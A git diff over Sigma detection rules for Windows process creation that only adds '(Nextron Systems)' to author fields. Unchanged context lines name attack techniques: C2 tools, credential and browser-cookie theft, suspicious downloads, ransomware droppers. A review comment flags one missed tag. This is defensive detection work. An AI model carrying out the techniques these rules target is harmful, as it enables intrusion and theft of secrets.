 - https://us-cert.cisa.gov/ncas/analysis-reports/ar20-216a
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2020/07/30
 modified: 2021/11/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_apt_turla_comrat_may20.yml b/rules/windows/process_creation/proc_creation_win_apt_turla_comrat_may20.yml
index 7fc776ebb..28cd00c19 100644
--- a/rules/windows/process_creation/proc_creation_win_apt_turla_comrat_may20.yml
+++ b/rules/windows/process_creation/proc_creation_win_apt_turla_comrat_may20.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects commands used by Turla group as reported by ESET in May 2020
 references:
 - https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2020/05/26
 modified: 2021/11/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_apt_unc2452_cmds.yml b/rules/windows/process_creation/proc_creation_win_apt_unc2452_cmds.yml
index 3f2490a9c..13a364af4 100644
--- a/rules/windows/process_creation/proc_creation_win_apt_unc2452_cmds.yml
+++ b/rules/windows/process_creation/proc_creation_win_apt_unc2452_cmds.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects a specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries
 references:
 - https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/01/22
 modified: 2022/12/18
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_apt_unc2452_ps.yml b/rules/windows/process_creation/proc_creation_win_apt_unc2452_ps.yml
index bc1458ab7..0f6acc3b6 100644
--- a/rules/windows/process_creation/proc_creation_win_apt_unc2452_ps.yml
+++ b/rules/windows/process_creation/proc_creation_win_apt_unc2452_ps.yml
@@ -6,7 +6,7 @@ references:
 - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware
 - https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md#atomic-test-7---create-a-process-using-wmi-query-and-an-encoded-command
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/01/20
 modified: 2022/10/09
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_apt_winnti_mal_hk_jan20.yml b/rules/windows/process_creation/proc_creation_win_apt_winnti_mal_hk_jan20.yml
index 78f6d504c..5a3cdc5b8 100644
--- a/rules/windows/process_creation/proc_creation_win_apt_winnti_mal_hk_jan20.yml
+++ b/rules/windows/process_creation/proc_creation_win_apt_winnti_mal_hk_jan20.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities
 references:
 - https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/
-author: Florian Roth, Markus Neis
+author: Florian Roth (Nextron Systems), Markus Neis
 date: 2020/02/01
 modified: 2021/11/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_apt_winnti_pipemon.yml b/rules/windows/process_creation/proc_creation_win_apt_winnti_pipemon.yml
index a19577e9c..17cce33e2 100644
--- a/rules/windows/process_creation/proc_creation_win_apt_winnti_pipemon.yml
+++ b/rules/windows/process_creation/proc_creation_win_apt_winnti_pipemon.yml
@@ -4,7 +4,7 @@ status: stable
 description: Detects specific process characteristics of Winnti Pipemon malware reported by ESET
 references:
 - https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/
-author: Florian Roth, oscd.community
+author: Florian Roth (Nextron Systems), oscd.community
 date: 2020/07/30
 modified: 2021/11/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_apt_wocao.yml b/rules/windows/process_creation/proc_creation_win_apt_wocao.yml
index e58ff94d0..fc1c5b15b 100644
--- a/rules/windows/process_creation/proc_creation_win_apt_wocao.yml
+++ b/rules/windows/process_creation/proc_creation_win_apt_wocao.yml
@@ -8,7 +8,7 @@ description: Detects activity mentioned in Operation Wocao report
 references:
 - https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/
 - https://twitter.com/SBousseaden/status/1207671369963646976
-author: Florian Roth, frack113
+author: Florian Roth (Nextron Systems), frack113
 date: 2019/12/20
 modified: 2022/10/09
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_apt_zxshell.yml b/rules/windows/process_creation/proc_creation_win_apt_zxshell.yml
index 551a1f487..8006c5fa9 100755
--- a/rules/windows/process_creation/proc_creation_win_apt_zxshell.yml
+++ b/rules/windows/process_creation/proc_creation_win_apt_zxshell.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects a ZxShell start by the called and well-known function name
 references:
 - https://www.hybrid-analysis.com/sample/5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16?environmentId=100
-author: Florian Roth, oscd.community, Jonhnathan Ribeiro
+author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro
 date: 2017/07/20
 modified: 2021/11/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_archiver_iso_phishing.yml b/rules/windows/process_creation/proc_creation_win_archiver_iso_phishing.yml
index c4e92e540..549022958 100644
--- a/rules/windows/process_creation/proc_creation_win_archiver_iso_phishing.yml
+++ b/rules/windows/process_creation/proc_creation_win_archiver_iso_phishing.yml
@@ -5,7 +5,7 @@ description: Detects cases in which an ISO files is opend within an archiver lik
 references:
 - https://twitter.com/1ZRR4H/status/1534259727059787783
 - https://app.any.run/tasks/e1fe6a62-bce8-4323-a49a-63795d9afd5d/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/06/07
 tags:
 - attack.initial_access
diff --git a/rules/windows/process_creation/proc_creation_win_attrib_system_susp_paths.yml b/rules/windows/process_creation/proc_creation_win_attrib_system_susp_paths.yml
index e8dc55098..030c074e7 100644
--- a/rules/windows/process_creation/proc_creation_win_attrib_system_susp_paths.yml
+++ b/rules/windows/process_creation/proc_creation_win_attrib_system_susp_paths.yml
@@ -8,7 +8,7 @@ description: Detects usage of attrib with "+s" option to set suspicious script o
 references:
 - https://app.any.run/tasks/c28cabc8-a19f-40f3-a78b-cae506a5c0d4
 - https://app.any.run/tasks/cfc8870b-ccd7-4210-88cf-a8087476a6d0
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/06/28
 modified: 2022/11/11
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_bad_opsec_sacrificial_processes.yml b/rules/windows/process_creation/proc_creation_win_bad_opsec_sacrificial_processes.yml
index 703c042ca..70dff26fa 100644
--- a/rules/windows/process_creation/proc_creation_win_bad_opsec_sacrificial_processes.yml
+++ b/rules/windows/process_creation/proc_creation_win_bad_opsec_sacrificial_processes.yml
@@ -16,7 +16,7 @@ references:
 - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32
 - https://docs.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool
 - https://docs.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool#feedback
-author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard
+author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)
 date: 2020/10/23
 modified: 2023/01/25
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_domain.yml b/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_domain.yml
index 9d072b132..964ba1081 100644
--- a/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_domain.yml
+++ b/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_domain.yml
@@ -8,7 +8,7 @@ references:
 - https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/
 - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker
 - https://www.cisa.gov/uscert/ncas/alerts/aa22-321a
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/06/28
 modified: 2023/01/19
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_ext.yml b/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_ext.yml
index ed32e048e..60314d86e 100644
--- a/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_ext.yml
+++ b/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_ext.yml
@@ -6,7 +6,7 @@ references:
 - https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin
 - https://isc.sans.edu/diary/22264
 - https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/06/28
 modified: 2022/11/11
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_ip.yml b/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_ip.yml
index b17ac63a8..589ac298d 100644
--- a/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_ip.yml
+++ b/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_ip.yml
@@ -10,7 +10,7 @@ references:
 - https://isc.sans.edu/diary/22264
 - https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/
 - https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/06/28
 modified: 2022/12/13
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder.yml b/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder.yml
index 5d8e61ee1..a49e4b29a 100644
--- a/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder.yml
+++ b/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder.yml
@@ -7,7 +7,7 @@ references:
 - https://isc.sans.edu/diary/22264
 - https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/
 - https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/06/28
 modified: 2022/12/13
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml b/rules/windows/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml
index 48f738718..aae96e7ce 100644
--- a/rules/windows/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml
+++ b/rules/windows/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml
@@ -7,7 +7,7 @@ references:
 - https://isc.sans.edu/diary/22264
 - https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/
 - https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/06/28
 modified: 2022/11/11
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_browser_remote_debugging.yml b/rules/windows/process_creation/proc_creation_win_browser_remote_debugging.yml
index 67cb203bb..f68fb3760 100644
--- a/rules/windows/process_creation/proc_creation_win_browser_remote_debugging.yml
+++ b/rules/windows/process_creation/proc_creation_win_browser_remote_debugging.yml
@@ -7,7 +7,7 @@ references:
 - https://www.mdsec.co.uk/2022/10/analysing-lastpass-part-1/
 - https://github.com/defaultnamehere/cookie_crimes/
 - https://github.com/wunderwuzzi23/firefox-cookiemonster
-author: pH-T, Nasreddine Bencherchali (update)
+author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
 date: 2022/07/27
 modified: 2022/12/23
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_c2_sliver.yml b/rules/windows/process_creation/proc_creation_win_c2_sliver.yml
index b9eaa9f3e..480ad9055 100644
--- a/rules/windows/process_creation/proc_creation_win_c2_sliver.yml
+++ b/rules/windows/process_creation/proc_creation_win_c2_sliver.yml
@@ -5,7 +5,7 @@ description: Detects process activity patterns as seen being used by Sliver C2 f
 references:
 - https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/implant/sliver/shell/shell_windows.go#L36
 - https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/
-author: Nasreddine Bencherchali, Florian Roth
+author: Nasreddine Bencherchali (Nextron Systems), Florian Roth
 date: 2022/08/25
 tags:
 - attack.execution
diff --git a/rules/windows/process_creation/proc_creation_win_certutil_ntlm_coercion.yml b/rules/windows/process_creation/proc_creation_win_certutil_ntlm_coercion.yml
index 600919203..fb903fd5a 100644
--- a/rules/windows/process_creation/proc_creation_win_certutil_ntlm_coercion.yml
+++ b/rules/windows/process_creation/proc_creation_win_certutil_ntlm_coercion.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects possible NTLM coercion via certutil using the 'syncwithWU' flag
 references:
 - https://github.com/LOLBAS-Project/LOLBAS/issues/243
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/09/01
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/process_creation/proc_creation_win_change_default_file_assoc_susp.yml b/rules/windows/process_creation/proc_creation_win_change_default_file_assoc_susp.yml
index 50d485df5..997e7332b 100644
--- a/rules/windows/process_creation/proc_creation_win_change_default_file_assoc_susp.yml
+++ b/rules/windows/process_creation/proc_creation_win_change_default_file_assoc_susp.yml
@@ -7,7 +7,7 @@ status: experimental
 description: Detects when a program changes the default file association of any extension to an executable
 references:
 - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/assoc
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/06/28
 modified: 2022/11/18
 tags:
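Review bot: The Sliver rule's new author line `+author: Nasreddine Bencherchali (Nextron Systems), Florian Roth` leaves Florian Roth without the `(Nextron Systems)` tag that every other hunk in this commit attaches to his name, so the affiliation tagging this commit sets out to do is incomplete in proc_creation_win_c2_sliver.yml. Unless the omission is intentional, the line should read `author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)`. This may be picked up by a later patch in the series, but fixing it here keeps the author field consistently greppable by affiliation across the rule set. The rule's detection logic lies outside the hunk and is unaffected.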
diff --git a/rules/windows/process_creation/proc_creation_win_chisel_usage.yml b/rules/windows/process_creation/proc_creation_win_chisel_usage.yml
index 002083247..2c4936720 100644
--- a/rules/windows/process_creation/proc_creation_win_chisel_usage.yml
+++ b/rules/windows/process_creation/proc_creation_win_chisel_usage.yml
@@ -9,7 +9,7 @@ references:
 - https://github.com/jpillora/chisel/
 - https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/
 - https://blog.sekoia.io/lucky-mouse-incident-response-to-detection-engineering/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/09/13
 modified: 2022/12/07
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_chromium_headless_debugging.yml b/rules/windows/process_creation/proc_creation_win_chromium_headless_debugging.yml
index 2e9cc1673..ac9bcdcf7 100644
--- a/rules/windows/process_creation/proc_creation_win_chromium_headless_debugging.yml
+++ b/rules/windows/process_creation/proc_creation_win_chromium_headless_debugging.yml
@@ -7,7 +7,7 @@ references:
 - https://mango.pdf.zone/stealing-chrome-cookies-without-a-password
 - https://embracethered.com/blog/posts/2020/cookie-crimes-on-mirosoft-edge/
 - https://embracethered.com/blog/posts/2020/chrome-spy-remote-control/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/12/23
 tags:
 - attack.credential_access
diff --git a/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml b/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml
index 6a747e5b0..9f3c85b0d 100644
--- a/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml
+++ b/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml
@@ -7,7 +7,7 @@ status: experimental
 description: Detects inline windows shell commands redirecting output via the ">" symbol to a suspicious location
 references:
 - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/07/12
 modified: 2023/01/19
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_cmdkey_recon.yml b/rules/windows/process_creation/proc_creation_win_cmdkey_recon.yml
index b63d63aa1..1bff1e7a6 100644
--- a/rules/windows/process_creation/proc_creation_win_cmdkey_recon.yml
+++ b/rules/windows/process_creation/proc_creation_win_cmdkey_recon.yml
@@ -5,7 +5,7 @@ description: Detects usage of cmdkey to look for cached credentials
 references:
 - https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
 - https://technet.microsoft.com/en-us/library/cc754243(v=ws.11).aspx
-author: jmallette, Florian Roth, Nasreddine Bencherchali (update)
+author: jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
 date: 2019/01/16
 modified: 2022/06/11
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_cmstp_com_object_access.yml b/rules/windows/process_creation/proc_creation_win_cmstp_com_object_access.yml
index dfa91262e..8a277b9f2 100644
--- a/rules/windows/process_creation/proc_creation_win_cmstp_com_object_access.yml
+++ b/rules/windows/process_creation/proc_creation_win_cmstp_com_object_access.yml
@@ -7,7 +7,7 @@ references:
 - https://twitter.com/hFireF0X/status/897640081053364225
 - https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf
 - https://github.com/hfiref0x/UACME
-author: Nik Seetharaman, Christian Burkard
+author: Nik Seetharaman, Christian Burkard (Nextron Systems)
 date: 2019/07/31
 modified: 2022/09/21
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_cobaltstrike_process_patterns.yml b/rules/windows/process_creation/proc_creation_win_cobaltstrike_process_patterns.yml
index d0f1b7646..8d3bcc69e 100644
--- a/rules/windows/process_creation/proc_creation_win_cobaltstrike_process_patterns.yml
+++ b/rules/windows/process_creation/proc_creation_win_cobaltstrike_process_patterns.yml
@@ -5,7 +5,7 @@ description: Detects process patterns found in Cobalt Strike beacon activity (se
 references:
 - https://hausec.com/2021/07/26/cobalt-strike-and-tradecraft/
 - https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/07/27
 modified: 2022/11/07
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml b/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml
index 4f025337a..372e01d12 100644
--- a/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml
+++ b/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml
@@ -5,7 +5,7 @@ description: Detects the attempt to evade or obfuscate the executed command on t
 references:
 - https://twitter.com/hexacorn/status/1448037865435320323
 - https://twitter.com/Gal_B1t/status/1062971006078345217
-author: Christian Burkard
+author: Christian Burkard (Nextron Systems)
 date: 2021/10/26
 modified: 2022/09/20
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_computer_discovery_get_adcomputer.yml b/rules/windows/process_creation/proc_creation_win_computer_discovery_get_adcomputer.yml
index 0989036a8..ff13c2741 100644
--- a/rules/windows/process_creation/proc_creation_win_computer_discovery_get_adcomputer.yml
+++ b/rules/windows/process_creation/proc_creation_win_computer_discovery_get_adcomputer.yml
@@ -9,7 +9,7 @@ references:
 - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html
 - https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/
 - https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/11/10
 modified: 2022/11/17
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_conhost_path_traversal.yml b/rules/windows/process_creation/proc_creation_win_conhost_path_traversal.yml
index 19287a4fe..49d97e07c 100644
--- a/rules/windows/process_creation/proc_creation_win_conhost_path_traversal.yml
+++ b/rules/windows/process_creation/proc_creation_win_conhost_path_traversal.yml
@@ -4,7 +4,7 @@ status: experimental
 description: detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking
 references:
 - https://pentestlab.blog/2020/07/06/indirect-command-execution/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/06/14
 tags:
 - attack.execution
diff --git a/rules/windows/process_creation/proc_creation_win_copy_browser_data.yml b/rules/windows/process_creation/proc_creation_win_copy_browser_data.yml
index 947d2dcac..0b3d77e87 100644
--- a/rules/windows/process_creation/proc_creation_win_copy_browser_data.yml
+++ b/rules/windows/process_creation/proc_creation_win_copy_browser_data.yml
@@ -10,7 +10,7 @@ description: |
 Web browsers typically store the credentials in an encrypted format within a credential store.
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.003/T1555.003.md
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/12/23
 modified: 2023/01/29
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_copy_dmp_from_share.yml b/rules/windows/process_creation/proc_creation_win_copy_dmp_from_share.yml
index 325bf81f9..7bb95f2bc 100644
--- a/rules/windows/process_creation/proc_creation_win_copy_dmp_from_share.yml
+++ b/rules/windows/process_creation/proc_creation_win_copy_dmp_from_share.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects usage of the copy command to copy files with the .dmp extensions from a remote share
 references:
 - https://thedfirreport.com/2022/09/26/bumblebee-round-two/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/09/27
 modified: 2022/11/18
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_crackmapexec_patterns.yml b/rules/windows/process_creation/proc_creation_win_crackmapexec_patterns.yml
index 345196a12..ffa23b140 100644
--- a/rules/windows/process_creation/proc_creation_win_crackmapexec_patterns.yml
+++ b/rules/windows/process_creation/proc_creation_win_crackmapexec_patterns.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects suspicious process patterns found in logs when CrackMapExec is used
 references:
 - https://mpgn.gitbook.io/crackmapexec/smb-protocol/obtaining-credentials/dump-lsass
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/03/12
 modified: 2022/11/18
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_creative_cloud_node_abuse.yml b/rules/windows/process_creation/proc_creation_win_creative_cloud_node_abuse.yml
index 4c5224800..68492df5c 100644
--- a/rules/windows/process_creation/proc_creation_win_creative_cloud_node_abuse.yml
+++ b/rules/windows/process_creation/proc_creation_win_creative_cloud_node_abuse.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud
 references:
 - https://twitter.com/mttaggart/status/1511804863293784064
-author: Max Altgelt
+author: Max Altgelt (Nextron Systems)
 date: 2022/04/06
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/process_creation/proc_creation_win_crime_fireball.yml b/rules/windows/process_creation/proc_creation_win_crime_fireball.yml
index c2889cc9e..86dceabc6 100755
--- a/rules/windows/process_creation/proc_creation_win_crime_fireball.yml
+++ b/rules/windows/process_creation/proc_creation_win_crime_fireball.yml
@@ -5,7 +5,7 @@ description: Detects Archer malware invocation via rundll32
 references:
 - https://www.virustotal.com/en/file/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022/analysis/
 - https://www.hybrid-analysis.com/sample/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022?environmentId=100
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/06/03
 modified: 2021/11/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_crime_maze_ransomware.yml b/rules/windows/process_creation/proc_creation_win_crime_maze_ransomware.yml
index af24a4df5..93fdec20b 100644
--- a/rules/windows/process_creation/proc_creation_win_crime_maze_ransomware.yml
+++ b/rules/windows/process_creation/proc_creation_win_crime_maze_ransomware.yml
@@ -6,7 +6,7 @@ references:
 - https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html
 - https://app.any.run/tasks/51e7185c-52d7-4efb-ac0d-e86340053473/
 - https://app.any.run/tasks/65a79440-373a-4725-8d74-77db9f2abda4/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2020/05/08
 modified: 2021/06/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_crime_snatch_ransomware.yml b/rules/windows/process_creation/proc_creation_win_crime_snatch_ransomware.yml
index 3636b6a56..075347775 100644
--- a/rules/windows/process_creation/proc_creation_win_crime_snatch_ransomware.yml
+++ b/rules/windows/process_creation/proc_creation_win_crime_snatch_ransomware.yml
@@ -4,7 +4,7 @@ status: stable
 description: Detects specific process characteristics of Snatch ransomware word document droppers
 references:
 - https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2020/08/26
 modified: 2021/11/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_crypto_mining_monero.yml b/rules/windows/process_creation/proc_creation_win_crypto_mining_monero.yml
index 76f97d366..a331f74b5 100644
--- a/rules/windows/process_creation/proc_creation_win_crypto_mining_monero.yml
+++ b/rules/windows/process_creation/proc_creation_win_crypto_mining_monero.yml
@@ -4,7 +4,7 @@ status: stable
 description: Detects command line parameters or strings often used by crypto miners
 references:
 - https://www.poolwatch.io/coin/monero
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/10/26
 modified: 2022/09/05
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_curl_download.yml b/rules/windows/process_creation/proc_creation_win_curl_download.yml
index 8889ae9f8..6656215af 100644
--- a/rules/windows/process_creation/proc_creation_win_curl_download.yml
+++ b/rules/windows/process_creation/proc_creation_win_curl_download.yml
@@ -7,7 +7,7 @@ status: test
 description: Detects a curl process start on Windows, which indicates a file download from a remote location or a simple web request to a remote server
 references:
 - https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/07/05
 tags:
 - attack.command_and_control
diff --git a/rules/windows/process_creation/proc_creation_win_dinjector.yml b/rules/windows/process_creation/proc_creation_win_dinjector.yml
index e81383637..612c417c5 100644
--- a/rules/windows/process_creation/proc_creation_win_dinjector.yml
+++ b/rules/windows/process_creation/proc_creation_win_dinjector.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects the use of the Dinject PowerShell cradle based on the specific flags
 references:
 - https://github.com/snovvcrash/DInjector
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/12/07
 modified: 2022/03/07
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_disable_service.yml b/rules/windows/process_creation/proc_creation_win_disable_service.yml
index 158cfdd99..b34a12ea4 100644
--- a/rules/windows/process_creation/proc_creation_win_disable_service.yml
+++ b/rules/windows/process_creation/proc_creation_win_disable_service.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects when attackers use "sc.exe" or the powershell "Set-Service" cmdlet to change the startup type of a service to "disabled"
 references:
 - https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/01
 tags:
 - attack.execution
diff --git a/rules/windows/process_creation/proc_creation_win_dll_sideload_vmware_xfer.yml b/rules/windows/process_creation/proc_creation_win_dll_sideload_vmware_xfer.yml
index b02f86bd4..be5739594 100644
--- a/rules/windows/process_creation/proc_creation_win_dll_sideload_vmware_xfer.yml
+++ b/rules/windows/process_creation/proc_creation_win_dll_sideload_vmware_xfer.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL
 references:
 - https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/02
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/process_creation/proc_creation_win_dns_serverlevelplugindll.yml b/rules/windows/process_creation/proc_creation_win_dns_serverlevelplugindll.yml
index 99e5a5ac2..f694c5876 100644
--- a/rules/windows/process_creation/proc_creation_win_dns_serverlevelplugindll.yml
+++ b/rules/windows/process_creation/proc_creation_win_dns_serverlevelplugindll.yml
@@ -7,7 +7,7 @@ status: test
 description: Detects the installation of a plugin DLL via ServerLevelPluginDll parameter in Registry, which can be used to execute code in context of the DNS server (restart required)
 references:
 - https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/05/08
 modified: 2022/10/09
 tags:
